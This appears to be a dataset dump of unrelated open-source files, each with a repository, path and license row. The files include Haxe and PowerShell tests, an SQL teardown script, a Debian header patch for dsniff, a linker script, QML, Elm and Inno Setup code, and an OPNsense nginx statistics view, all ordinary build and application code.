var ok2 = (Int64.compare( min2, i64nan) <= 0) && (Int64.compare( i64nan, max2) <= 0);
if( ! (ok1 || ok2))
throw 'BitConverter NaN-Test #2: failed';
}
#end
}
| Haxe | 5 | Jimexist/thrift | lib/haxe/src/org/apache/thrift/helper/BitConverter.hx | [
"Apache-2.0"
] |
DROP TABLE IF EXISTS hdb_catalog.hdb_source_catalog_version;
DROP FUNCTION IF EXISTS hdb_catalog.insert_event_log(text, text, text, text, json);
DROP TABLE IF EXISTS hdb_catalog.event_invocation_logs;
DROP TABLE IF EXISTS hdb_catalog.event_log;
| SQL | 1 | gh-oss-contributor/graphql-engine-1 | server/src-rsr/drop_pg_source.sql | [
"Apache-2.0",
"MIT"
] |
This utility only reads in a file and prints it out
Read:
>+[>,]
Rewind:
<[<]
Write:
>>[.>]
| Brainfuck | 1 | RubenNL/brainheck | examples/cat-1.bf | [
"Apache-2.0"
] |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
Describe "Hierarchical paths" -Tags "CI" {
BeforeAll {
$data = "Hello World"
Setup -File testFile.txt -Content $data
}
It "should work with Join-Path " {
$testPath = Join-Path $TestDrive testFile.txt
Get-Content $testPath | Should -BeExactly $data
}
It "should work with platform's slashes" {
$testPath = "$TestDrive$([IO.Path]::DirectorySeparatorChar)testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work with forward slashes" {
$testPath = "$TestDrive/testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work with backward slashes" {
$testPath = "$TestDrive\testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work with backward slashes for each separator" {
$testPath = "$TestDrive\testFile.txt".Replace("/","\")
Get-Content $testPath | Should -BeExactly $data
}
It "should work with forward slashes for each separator" {
$testPath = "$TestDrive/testFile.txt".Replace("\","/")
Get-Content $testPath | Should -BeExactly $data
}
It "should work even if there are too many forward slashes" {
$testPath = "$TestDrive//////testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
It "should work even if there are too many backward slashes" {
$testPath = "$TestDrive\\\\\\\testFile.txt"
Get-Content $testPath | Should -BeExactly $data
}
}
| PowerShell | 4 | rdtechie/PowerShell | test/powershell/Modules/Microsoft.PowerShell.Management/Hierarchical-Path.Tests.ps1 | [
"MIT"
] |
package com.baeldung.autovalue;
public class MutableMoney {
@Override
public String toString() {
return "MutableMoney [amount=" + amount + ", currency=" + currency + "]";
}
public long getAmount() {
return amount;
}
public void setAmount(long amount) {
this.amount = amount;
}
public String getCurrency() {
return currency;
}
public void setCurrency(String currency) {
this.currency = currency;
}
private long amount;
private String currency;
public MutableMoney(long amount, String currency) {
super();
this.amount = amount;
this.currency = currency;
}
}
| Java | 4 | zeesh49/tutorials | autovalue/src/main/java/com/baeldung/autovalue/MutableMoney.java | [
"MIT"
] |
MEMORY
{
ram (rw) : o = 0x0000400, l = 31k
rom (rx) : o = 0x00A0000, l = 384k
nrom(rx) : o = 0x0000F000, l = 4k
xram(rw) : o = 0x00028000, l = 4k
}
_system_stack_size = 0x800;
SECTIONS
{
/* Variable Vector Section */
.var_vects 0x000FA000 :
{
KEEP(*( .var_vects))
} > rom
.text 0x000DD000 :
{
*(.text)
*(.text.*)
/* section information for finsh shell */
. = ALIGN(4);
___fsymtab_start = .;
KEEP(*(FSymTab))
___fsymtab_end = .;
. = ALIGN(4);
___vsymtab_start = .;
KEEP(*(VSymTab))
___vsymtab_end = .;
. = ALIGN(4);
etext = .;
} > rom
.rodata :
{
_rodata = .;
*(.rodata)
*(.rodata.*)
*(.frodata)
_erodata = .;
} > rom
.init :
{
*(.init)
} > rom
.fini :
{
*(.fini)
} > rom
.got :
{
*(.got)
*(.got.plt)
} > rom
.eh_frame_hdr :
{
*(.eh_frame_hdr)
} > rom
.eh_frame :
{
*(.eh_frame)
} > rom
.jcr :
{
*(.jcr)
} > rom
.tors :
{
__CTOR_LIST__ = .;
___ctors = .;
*(.ctors)
___ctors_end = .;
__CTOR_END__ = .;
__DTOR_LIST__ = .;
___dtors = .;
*(.dtors)
___dtors_end = .;
__DTOR_END__ = .;
_mdata = .;
} > rom
.data 0x00000400 : AT (_mdata)
{
_data = .;
*(.data)
*(.data.*)
*(.ndata)
*(.ndata.*)
*(.plt)
_edata = .;
} > ram
.bss :
{
_bss = .;
*(.bss)
*(COMMON)
*(.nbss)
_ebss = .;
_end = .;
} > ram
.gcc_exc :
{
*(.gcc_exc)
} > ram
/* User Stack Pointer */
/*
.ustack 0x00003000 :
{
_ustack = .;
} > ram
*/
/* Interrupt Stack Pointer */
.istack :
{
. = . + _system_stack_size;
. = ALIGN(4);
_istack = .;
} > ram
. = ALIGN(4);
_user_ram_end = .;
.nrodata 0x0000F000 :
{
_nrodata = .;
*(.nrodata)
*(.nrodata.*)
_enrodata = .;
} > nrom
.fdata 0x00028000 : AT (_mdata + SIZEOF(.data))
{
_fdata = .;
*(.fdata)
*(.fdata.*)
_efdata = .;
} > xram
.fbss :
{
_fbss = .;
*(.fbss)
*(.fbss.*)
_efbss = .;
} > xram
/* Fixed Vector Section */
.vects 0x000FFFDC :
{
KEEP(*( .vects))
} > rom
} | Linker Script | 4 | Davidfind/rt-thread | bsp/m16c62p/m16c62p.ld | [
"Apache-2.0"
] |
import QtQuick 2.3
import QtQuick.Controls 1.2
import QtQuick.Controls.Styles 1.4
import QGroundControl.ScreenTools 1.0
import QGroundControl.Palette 1.0
Item {
id: _root
signal clicked()
property alias buttonImage: button.source
property real radius: ScreenTools.isMobile ? ScreenTools.defaultFontPixelHeight * 1.75 : ScreenTools.defaultFontPixelHeight * 1.25
property bool rotateImage: false
property bool lightBorders: true
width: radius * 2
height: radius * 2
property bool checked: false
property ExclusiveGroup exclusiveGroup: null
QGCPalette { id: qgcPal }
onExclusiveGroupChanged: {
if (exclusiveGroup) {
exclusiveGroup.bindCheckable(_root)
}
}
onRotateImageChanged: {
if (rotateImage) {
imageRotation.running = true
} else {
imageRotation.running = false
button.rotation = 0
}
}
Rectangle {
anchors.fill: parent
radius: width / 2
border.width: ScreenTools.defaultFontPixelHeight * 0.0625
border.color: lightBorders ? qgcPal.mapWidgetBorderLight : qgcPal.mapWidgetBorderDark
color: checked ? qgcPal.buttonHighlight : qgcPal.button
QGCColoredImage {
id: button
anchors.fill: parent
sourceSize.height: parent.height
fillMode: Image.PreserveAspectFit
mipmap: true
smooth: true
color: checked ? qgcPal.buttonHighlightText : qgcPal.buttonText
RotationAnimation on rotation {
id: imageRotation
loops: Animation.Infinite
from: 0
to: 360
duration: 500
running: false
}
MouseArea {
anchors.fill: parent
onClicked: {
checked = !checked
_root.clicked()
}
}
}
}
}
| QML | 4 | uavosky/uavosky-qgroundcontrol | src/QmlControls/RoundButton.qml | [
"Apache-2.0"
] |
#AutoIt3Wrapper_Change2CUI=y
ConsoleWrite("Hello World !")
sleep(99999999)
| AutoIt | 1 | tanay-pingalkar/HelloWorld | autoit/HelloWorld.au3 | [
"MIT"
] |
//===--- UnavailableFoundationMethodThunks.mm -----------------------------===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
#include <Foundation/Foundation.h>
#include "swift/Runtime/Config.h"
SWIFT_CC(swift) SWIFT_RUNTIME_LIBRARY_VISIBILITY
extern "C" void
NSArray_getObjects(NSArray *_Nonnull nsArray,
id *objects, NSUInteger rangeLocation,
NSUInteger rangeLength) {
[nsArray getObjects:objects range:NSMakeRange(rangeLocation, rangeLength)];
}
SWIFT_CC(swift) SWIFT_RUNTIME_LIBRARY_VISIBILITY
extern "C" void
NSDictionary_getObjectsAndKeysWithCount(NSDictionary *_Nonnull nsDictionary,
id *objects, id *keys,
NSInteger count) {
[nsDictionary getObjects:objects andKeys:keys count:count];
}
| Objective-C++ | 3 | lwhsu/swift | stdlib/private/StdlibUnittestFoundationExtras/UnavailableFoundationMethodThunks.mm | [
"Apache-2.0"
] |
#! /bin/sh /usr/share/dpatch/dpatch-run
## 12_arpa_inet_header.dpatch by Luciano Bello <luciano@linux.org.ar>
##
## All lines beginning with `## DP:' are a description of the patch.
## DP: aviod the "implicit declaration of function 'ntohs'" warning
@DPATCH@
diff -urNad dsniff-2.4b1+debian~/decode_aim.c dsniff-2.4b1+debian/decode_aim.c
--- dsniff-2.4b1+debian~/decode_aim.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_aim.c 2007-06-17 16:26:46.000000000 -0300
@@ -14,6 +14,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "hex.h"
#include "buf.h"
diff -urNad dsniff-2.4b1+debian~/decode_mmxp.c dsniff-2.4b1+debian/decode_mmxp.c
--- dsniff-2.4b1+debian~/decode_mmxp.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_mmxp.c 2007-06-17 16:26:46.000000000 -0300
@@ -21,6 +21,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "buf.h"
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/decode_pptp.c dsniff-2.4b1+debian/decode_pptp.c
--- dsniff-2.4b1+debian~/decode_pptp.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_pptp.c 2007-06-17 16:26:46.000000000 -0300
@@ -16,6 +16,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "buf.h"
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/decode_tds.c dsniff-2.4b1+debian/decode_tds.c
--- dsniff-2.4b1+debian~/decode_tds.c 2007-06-17 16:26:46.000000000 -0300
+++ dsniff-2.4b1+debian/decode_tds.c 2007-06-17 16:26:46.000000000 -0300
@@ -19,6 +19,7 @@
#include <stdio.h>
#include <string.h>
#include <strlcat.h>
+#include <arpa/inet.h>
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/decode_vrrp.c dsniff-2.4b1+debian/decode_vrrp.c
--- dsniff-2.4b1+debian~/decode_vrrp.c 2007-06-17 16:22:39.000000000 -0300
+++ dsniff-2.4b1+debian/decode_vrrp.c 2007-06-17 16:26:46.000000000 -0300
@@ -15,6 +15,7 @@
#include <stdio.h>
#include <string.h>
+#include <arpa/inet.h>
#include "buf.h"
#include "decode.h"
diff -urNad dsniff-2.4b1+debian~/ssh.c dsniff-2.4b1+debian/ssh.c
--- dsniff-2.4b1+debian~/ssh.c 2007-06-17 16:26:46.000000000 -0300
+++ dsniff-2.4b1+debian/ssh.c 2007-06-17 16:26:46.000000000 -0300
@@ -23,6 +23,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
+#include <arpa/inet.h>
#include <unistd.h>
#include "hex.h"
| Darcs Patch | 4 | acheong08/dsniff | debian/patches/12_arpa_inet_header.dpatch | [
"BSD-3-Clause"
] |
source ./test-functions.sh
install_service
useradd wagner
echo 'RUN_AS_USER=wagner' > /test-service/spring-boot-app.conf
useradd phil
chown phil /test-service/spring-boot-app.jar
start_service
await_app
ls -la /var/log/spring-boot-app.log
| Shell | 3 | yiou362/spring-boot-2.2.9.RELEASE | spring-boot-tests/spring-boot-integration-tests/spring-boot-launch-script-tests/src/test/resources/scripts/launch-with-run-as-user-preferred-to-jar-owner.sh | [
"Apache-2.0"
] |
stocks
load tsla
bt
whatif
whatif -n 2.34
whatif 2021-01-01
ema
ema_cross
rsi | Gosu | 2 | minhhoang1023/GamestonkTerminal | scripts/test_stocks_bt.gst | [
"MIT"
] |
(set-info :smt-lib-version 2.6)
(set-logic QF_UFLRA)
(set-info :source |CPAchecker with k-induction on SV-COMP14 program using MathSAT5, submitted by Philipp Wendler, http://cpachecker.sosy-lab.org|)
(set-info :category "industrial")
(set-info :status unsat)
(define-fun _1 () Bool true)
(define-fun _2 () Bool false)
(assert _1)
(assert _2)
(check-sat)
(exit)
| SMT | 2 | livinlife6751/infer | sledge/test/smt/QF_UFLRA/cpachecker-induction-svcomp14/cpachecker-induction.32_1_cilled_true-unreach-call_ok_nondet_linux-3.4-32_1-drivers--i2c--algos--i2c-algo-pca.ko-ldv_main0_sequence_infinite_withcheck_stateful.cil.out.c.smt2 | [
"MIT"
] |
module RequestBufferTests exposing (all)
import Common
import Dashboard.RequestBuffer exposing (Buffer(..), handleCallback, handleDelivery)
import Expect
import Message.Callback exposing (Callback(..))
import Message.Effects exposing (Effect(..))
import Message.Subscription exposing (Delivery(..), Interval(..))
import Test exposing (Test, describe, test)
import Time
all : Test
all =
describe "RequestBuffer"
[ test "auto refreshes on five-second tick after previous request finishes" <|
\_ ->
( False, [] )
|> handleCallback callback [ buffer ]
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> Tuple.second
|> Common.contains effect
, test "doesn't fetch until the first request finishes" <|
\_ ->
( False, [] )
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> Tuple.second
|> Common.notContains effect
, test "doesn't fetch until the last request finishes" <|
\_ ->
( False, [] )
|> handleCallback callback [ buffer ]
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> handleDelivery
(ClockTicked FiveSeconds <| Time.millisToPosix 0)
[ buffer ]
|> Tuple.second
|> Expect.equal [ effect ]
]
callback =
EmptyCallback
effect =
FetchUser
buffer : Buffer Bool
buffer =
Buffer effect
((==) callback)
(always False)
{ get = identity
, set = always
}
| Elm | 4 | Caprowni/concourse | web/elm/tests/RequestBufferTests.elm | [
"Apache-2.0"
] |
// RubyInstaller Inno Setup GUI Customizations
//
// Copyright (c) 2009-2012 Jon Maken
// Copyright (c) 2012 Yusuke Endoh
// Revision: 2012-05-28 13:58:04 -0600
// License: Modified BSD License
const
ChkBoxBaseY = 95;
ChkBoxBaseHeight = 17;
ChkBoxBaseLeft = 18;
var
PathChkBox, PathExtChkBox, TclTkChkBox: TCheckBox;
function IsAssociated(): Boolean;
begin
Result := PathExtChkBox.Checked;
end;
function IsModifyPath(): Boolean;
begin
Result := PathChkBox.Checked;
end;
function IsTclTk(): Boolean;
begin
Result := TclTkChkBox.Checked;
end;
procedure ParseSilentTasks();
var
I, N: Integer;
Param: String;
Tasks: TStringList;
begin
{* parse command line args for silent install tasks *}
for I := 0 to ParamCount do
begin
Param := AnsiUppercase(ParamStr(I));
if Pos('/TASKS', Param) <> 0 then
begin
Param := Trim(Copy(Param, Pos('=', Param) + 1, Length(Param)));
try
// TODO check for too many tasks to prevent overflow??
Tasks := StrToList(Param, ',');
for N := 0 to Tasks.Count - 1 do
case Trim(Tasks.Strings[N]) of
'ADDTK': TclTkChkBox.State := cbChecked;
'MODPATH': PathChkBox.State := cbChecked;
'ASSOCFILES': PathExtChkBox.State := cbChecked;
end;
finally
Tasks.Free;
end;
end;
end;
end;
procedure URLText_OnClick(Sender: TObject);
var
ErrorCode: Integer;
begin
if Sender is TNewStaticText then
ShellExec('open', TNewStaticText(Sender).Caption, '', '', SW_SHOWNORMAL, ewNoWait, ErrorCode);
end;
procedure InitializeWizard;
var
ChkBoxCurrentY: Integer;
Page: TWizardPage;
HostPage: TNewNotebookPage;
URLText, TmpLabel: TNewStaticText;
begin
{* Path, Tcl/Tk, and file association task check boxes *}
Page := PageFromID(wpSelectDir);
ChkBoxCurrentY := ChkBoxBaseY;
#ifndef NoTk
TclTkChkBox := TCheckBox.Create(Page);
TclTkChkBox.Parent := Page.Surface;
TclTkChkBox.State := cbUnchecked;
TclTkChkBox.Caption := CustomMessage('InstallTclTk');
TclTkChkBox.Hint := CustomMessage('InstallTclTkHint');
TclTkChkBox.ShowHint := True;
TclTkChkBox.Alignment := taRightJustify;
TclTkChkBox.Top := ScaleY(ChkBoxBaseY);
TclTkChkBox.Left := ScaleX(ChkBoxBaseLeft);
TclTkChkBox.Width := Page.SurfaceWidth;
TclTkChkBox.Height := ScaleY(ChkBoxBaseHeight);
ChkBoxCurrentY := ChkBoxCurrentY + ChkBoxBaseHeight;
#endif
PathChkBox := TCheckBox.Create(Page);
PathChkBox.Parent := Page.Surface;
PathChkBox.State := cbUnchecked;
PathChkBox.Caption := CustomMessage('AddPath');
PathChkBox.Hint := CustomMessage('AddPathHint');
PathChkBox.ShowHint := True;
PathChkBox.Alignment := taRightJustify;
PathChkBox.Top := ScaleY(ChkBoxCurrentY);
PathChkBox.Left := ScaleX(ChkBoxBaseLeft);
PathChkBox.Width := Page.SurfaceWidth;
PathChkBox.Height := ScaleY(ChkBoxBaseHeight);
ChkBoxCurrentY := ChkBoxCurrentY + ChkBoxBaseHeight;
PathExtChkBox := TCheckBox.Create(Page);
PathExtChkBox.Parent := Page.Surface;
PathExtChkBox.State := cbUnchecked;
PathExtChkBox.Caption := CustomMessage('AssociateExt');
PathExtChkBox.Hint := CustomMessage('AssociateExtHint');
PathExtChkBox.ShowHint := True;
PathExtChkBox.Alignment := taRightJustify;
PathExtChkBox.Top := ScaleY(ChkBoxCurrentY);
PathExtChkBox.Left := ScaleX(ChkBoxBaseLeft);
PathExtChkBox.Width := Page.SurfaceWidth;
PathExtChkBox.Height := ScaleY(ChkBoxBaseHeight);
{* Single Ruby installation tip message *}
TmpLabel := TNewStaticText.Create(Page);
TmpLabel.Parent := Page.Surface;
TmpLabel.Top := ScaleY(ChkBoxCurrentY + 30);
TmpLabel.Left := ScaleX(6);
TmpLabel.Width := Page.SurfaceWidth;
TmpLabel.WordWrap := True;
TmpLabel.Caption := CustomMessage('MouseoverHint');
ParseSilentTasks;
{* Labels and links back to RubyInstaller project pages *}
HostPage := WizardForm.FinishedPage;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(180);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('WebSiteLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://rubyinstaller.org';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(196);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('SupportGroupLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://groups.google.com/group/rubyinstaller';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(212);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('WikiLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://wiki.github.com/oneclick/rubyinstaller';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(245);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('IntroductionDevKitLabel');
TmpLabel := TNewStaticText.Create(HostPage);
TmpLabel.Parent := HostPage;
TmpLabel.Top := ScaleY(260);
TmpLabel.Left := ScaleX(176);
TmpLabel.AutoSize := True;
TmpLabel.Caption := CustomMessage('DevKitLabel');
URLText := TNewStaticText.Create(HostPage);
URLText.Parent := HostPage;
URLText.Top := TmpLabel.Top;
URLText.Left := TmpLabel.Left + TmpLabel.Width + ScaleX(4);
URLText.AutoSize := True;
URLText.Caption := 'http://rubyinstaller.org/add-ons/devkit';
URLText.Cursor := crHand;
URLText.Font.Color := clBlue;
URLText.OnClick := @URLText_OnClick;
end;
procedure CurPageChanged(CurPageID: Integer);
begin
if CurPageID = wpSelectDir then
WizardForm.NextButton.Caption := SetupMessage(msgButtonInstall);
end;
| Inno Setup | 5 | i-s-o/rubyinstaller | resources/installer/ri_gui.iss | [
"BSD-3-Clause"
] |
# NOTE: Assertions have been autogenerated by utils/update_mir_test_checks.py
# RUN: llc -O0 -mtriple=mipsel-linux-gnu -mcpu=mips32r5 -mattr=msa,+fp64 -mattr=nan2008 -run-pass=legalizer -verify-machineinstrs %s -o - | FileCheck %s -check-prefixes=P5600
--- |
define void @load_store_v16i8(<16 x i8>* %a, <16 x i8>* %b) { entry: ret void }
define void @load_store_v8i16(<8 x i16>* %a, <8 x i16>* %b) { entry: ret void }
define void @load_store_v4i32(<4 x i32>* %a, <4 x i32>* %b) { entry: ret void }
define void @load_store_v2i64(<2 x i64>* %a, <2 x i64>* %b) { entry: ret void }
define void @load_store_v4f32(<4 x float>* %a, <4 x float>* %b) { entry: ret void }
define void @load_store_v2f64(<2 x double>* %a, <2 x double>* %b) { entry: ret void }
...
---
name: load_store_v16i8
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v16i8
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<16 x s8>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<16 x s8>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<16 x s8>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<16 x s8>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v8i16
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v8i16
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<8 x s16>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<8 x s16>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<8 x s16>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<8 x s16>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v4i32
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v4i32
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<4 x s32>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<4 x s32>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<4 x s32>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<4 x s32>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v2i64
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v2i64
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<2 x s64>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<2 x s64>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<2 x s64>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<2 x s64>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v4f32
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v4f32
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<4 x s32>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<4 x s32>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<4 x s32>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<4 x s32>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
---
name: load_store_v2f64
alignment: 4
tracksRegLiveness: true
body: |
bb.1.entry:
liveins: $a0, $a1
; P5600-LABEL: name: load_store_v2f64
; P5600: liveins: $a0, $a1
; P5600: [[COPY:%[0-9]+]]:_(p0) = COPY $a0
; P5600: [[COPY1:%[0-9]+]]:_(p0) = COPY $a1
; P5600: [[LOAD:%[0-9]+]]:_(<2 x s64>) = G_LOAD [[COPY1]](p0) :: (load 16 from %ir.b)
; P5600: G_STORE [[LOAD]](<2 x s64>), [[COPY]](p0) :: (store 16 into %ir.a)
; P5600: RetRA
%0:_(p0) = COPY $a0
%1:_(p0) = COPY $a1
%2:_(<2 x s64>) = G_LOAD %1(p0) :: (load 16 from %ir.b)
G_STORE %2(<2 x s64>), %0(p0) :: (store 16 into %ir.a)
RetRA
...
| Mirah | 3 | medismailben/llvm-project | llvm/test/CodeGen/Mips/GlobalISel/legalizer/load_store_vec.mir | [
"Apache-2.0"
] |
sleep 1
t app led_count 0
sleep 1
t app led red_back on
| AGS Script | 1 | waltersgrey/autoexechack | TurnOnAndLED/Back-led/Hero3PlusBlack/autoexec.ash | [
"MIT"
] |
<%@ page contentType="text/html; charset=utf-8"%>
<%@include file="../../report/reportTree.jsp"%>
| Java Server Pages | 1 | woozhijun/cat | cat-home/src/main/webapp/jsp/system/alarm/alarm.jsp | [
"Apache-2.0"
] |
{#
# Copyright (C) 2017-2018 Fabian Franz
# Copyright (C) 2015 YoungJoo.Kim <vozltx@gmail.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#}
<script src="{{ cache_safe('/ui/js/nginx/lib/lodash.min.js') }}"></script>
<script src="{{ cache_safe('/ui/js/nginx/lib/backbone-min.js') }}"></script>
<link rel="stylesheet" href="{{ cache_safe('/ui/css/nginx/vts.css') }}" type="text/css" />
<div id="update" class="update">
<strong>{{ lang._('Update Interval:') }}</strong>
<select id="refresh">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
</select>
<strong>{{ lang._('Seconds') }}</strong>
</div>
<div id="monitor"></div>
<script>
// Tracks per-key counter samples between polls so that per-second rates can
// be derived from successive absolute counter values.
function DataPoint() {
  this.data = [];                 // last absolute value seen for each key
  this.msec = {
    last: undefined,              // timestamp (ms) of the previous refresh
    period: undefined             // elapsed ms between the last two refreshes
  };
}
// Return the per-second rate for `key` given its new absolute `value`.
// The first sample for a key yields 'n/a' since no delta exists yet.
DataPoint.prototype.getValue = function(key, value) {
  const previous = this.data[key];
  this.data[key] = value;
  if (typeof previous === 'undefined') {
    return 'n/a';
  }
  return Math.floor((value - previous) * 1000 / this.msec.period);
};
// Record the timestamp of the current poll and the elapsed period since
// the previous one.
DataPoint.prototype.refresh = function(time) {
  this.msec.period = time - this.msec.last;
  this.msec.last = time;
};
// Backbone model for one configured upstream; records are keyed by the
// OPNsense configuration UUID.
